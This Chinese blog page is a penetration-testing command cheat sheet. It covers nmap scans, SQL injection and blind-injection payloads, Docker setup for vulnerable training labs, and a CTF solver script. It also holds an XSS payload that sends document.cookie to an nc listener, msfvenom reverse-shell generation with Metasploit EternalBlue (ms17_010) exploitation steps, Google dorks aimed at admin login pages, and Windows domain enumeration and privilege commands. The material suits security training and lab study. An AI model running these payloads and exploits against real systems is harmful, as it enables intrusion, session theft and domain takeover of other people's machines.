首页 > 安全 > 安全相关常用操作命令备忘

安全相关常用操作命令备忘

1、nmap扫描

Intense scan,10000端口
nmap -T4 -A -v 10.10.10.10

--Intense scan, all TCP ports
nmap -p 1-65535 -T4 -A -v 10.10.10.10

Intense scan, no ping
nmap -T4 -A -v -Pn 10.10.10.10

Slow comprehensive scan
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" 10.10.10.10

版本探测 : -sV 
操作系统 : -O
-oN <File>


2、三组六条

# 单引号注
1' and 1='1 # and连接,若查询1结果正确,返回值为真
1' and 1='2 # and连接,若查询1结果正确,返回值为假
# 双引号注
1" and 1="1 # and连接,若查询1结果正确,返回值为真
1" and 1="2 # and连接,若查询1结果正确,返回值为假
# 数字型注
1 and 1=1 # and连接,若查询1结果正确,返回值为真
1 and 1=2 # and连接,若查询1结果正确,返回值为假

3、盲注

1' and ascii(substr((select f1a9 from Fl4g),1,1)) = 72#

4、docker靶场
kali安装docker:

apt install docker.io

kali安装docker-compose:

# 安装python
curl -s https://bootstrap.pypa.io/get-pip.py | python3
# 安装docker-compose
pip3 install docker-compose
# 安装成功
docker-compose -v

使用Portainer管理Docker

Portainer的Hub地址是:https://hub.docker.com/r/portainer/portainer/

运行命令是:
mkdir -p /docker/portainer_data
cd /docker
docker volume create portainer_data
--每次启动 portainer时该命令需要运行
docker run -it -d -p 9000:9000  --privileged --name portainer -v /var/run/docker.sock:/var/run/docker.sock -v portainer_data:/data portainer/portainer
访问你的IP:9000即可进入容器管理页面
docker run --name portainer -it -d -P portainer/portainer

dvwa漏洞平台:

docker pull daocloud.io/liusheng/dvwa:master-383e725
docker run -dit -p 8083:80 daocloud.io/liusheng/dvwa:master-383e725

webug平台:

docker run -dit -p 8084:80 area39/webug
docker pull area39/webug

docker exec -it 4664371b733b /bin/bash
docker  container  update  --restart=always  {容器ID}

开源docker 靶场:

https://github.com/vulhub/vulhub

文件上传靶场:
docker run -dit -p 8391:80 c0ny1/upload-labs

sql注入靶场:
docker run -dit -p 8392:80 acgpiano/sqli-labs

5、秋名山

import requests
import re
url = 'http://120.24.86.145:8002/qiumingshan/'
s = requests.Session()
source = s.get(url)
expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group()
result = eval(expression)
post = {'value': result}
print(s.post(url, data = post).text)

6、接收cookie

nc -lnvp 8899
<script>window.location.href = "http://192.168.133.131:8899/?cookie="%2bdocument.cookie;</script>

7、ms17_010

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.98 LPORT=9999 -f exe > shell.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.98
Run

search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhost 192.168.31.50
set lhost 192.168.31.98
exploit
shell

8、Google Hacking
1)基本命令:

intitle:	从网页标题中搜索指定的关键字
inurl:		从url中搜索指定的关键字
intext:		从网页中搜索指定的关键字
filetype:	搜索指定的文件后缀
site:		在某个指定的网站内搜索指定的内容
link:		搜索与该链接有关的链接

2)通配符(+-前需加一个空格):

+			强制包含某个字符进行查询
-			查询时忽略某个字符
""			查询时精确匹配双引号内的字符
.			匹配某单个字符进行查询
*			匹配任意字符进行查询
|			或者逗号(,)多个选择,只要有一个关键字匹配即可

3)举例:

inurl:/admin intext:后台管理系统
site:"some-keywords.com" intitle:loginin intext:intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system

9、windows信息收集
1)当前shell权限

whoami /user
whoami /priv

2)查看系统信息

systeminfo

3)网络连接信息

netstat -ano|findstr "3389"

4)操作系统

ver

5)杀软

wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName /Format:List

6)当前安装程序

wmic product get name, version

7)在线用户

quser

8)查进程

tasklist /v

9)当前登录的域

net config workstation

10)远程连接历史

cmdkey /l

11)查看本机帐号

net user xxx
net user /domain 显示所在域的用户名单
net user 域用户/ domain 获取某个域用户的详细信息
net user /domain XXX 12345678 修改域用户密码,需要域管理员权限
nltest /domain_trusts /all_trusts /v /server:192,168.xx.xx  返回所有信任192.168.xx.xx
nltest /dsgetdc:hack /server:192.168.xx.xx 返回域控和其相应的IP地址
net user /do 获取域用户列表
net group "domain admins" /domain 获取域管理员列表
net group "domain controllers" /domain 查看域控制器(如果有多台)
net group" domain computers" /domain 查看域机器n
net group /domain 查询域里面的工作组
net localgroup administrators 本机管理员(通常含有域用户)
net localgroup administrators /domain 登录本机的域管理员
net localgroup administrators workgroup\useroo1 /add 域用户添加到本机
net view 查看同一域内机器列表
net view \\ip 查看某IP共享
net view \\XXX 查看XXX计算机的共享资源列表
net view /domain 查看内网存在多少个域
net view /domain:XYZ 查看XYZ域中的机器列表
分类: 安全 标签:
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.